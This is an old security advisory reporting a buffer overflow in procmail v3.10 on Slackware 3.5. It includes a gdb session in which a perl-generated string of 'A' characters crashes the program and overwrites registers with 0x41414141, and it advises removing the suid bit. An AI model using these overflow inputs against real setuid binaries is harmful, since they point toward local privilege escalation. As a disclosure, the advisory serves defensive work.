COMMAND

    procmail

SYSTEMS AFFECTED

    Linux Slackware 3.5 (others?)

PROBLEM

    M.C.Mar posted following.  He found buffer overflow in procmail.

        woozle:~> gdb ./procmail
        [...]
        (gdb)  r `perl -e 'print "A" x 5000'`
        Starting program: /home/emsi/./procmail `perl -e 'print "A" x 5000'`
        [You need to type ^D here!!!]

        procmail: Couldn't create "/var/spool/mail/emsi"
        (no debugging symbols found)...(no debugging symbols found)...
        Program received signal SIGSEGV, Segmentation fault.
        0x4008a107 in malloc ()

    Interesting, isn't it? But look at this:

        (gdb)  r `perl -e 'print "A" x 7000'`
        [...]
        Starting program: /home/emsi/./procmail `perl -e 'print "A" x 7000'`
        procmail: Couldn't create "/var/spool/mail/emsi"

        Program received signal SIGSEGV, Segmentation fault.
        0x4007dfa3 in strncmp ()

    But this time, there is something more interesting:

        (gdb) x/i 0x4007dfa3
        0x4007dfa3 <strncmp+19>:        lodsb  %ds:(%esi),%al
        (gdb) info registers
        eax            0x41414141       1094795585
        esi            0x41414141       1094795585
        ds             0x2b     43

    Procmail in question is procmail v3.10 1994/10/31 which comes with
    Slackware 3.5.

SOLUTION

    Nothing yet, but still  to be sure remove  suid and watch out  for
    updates.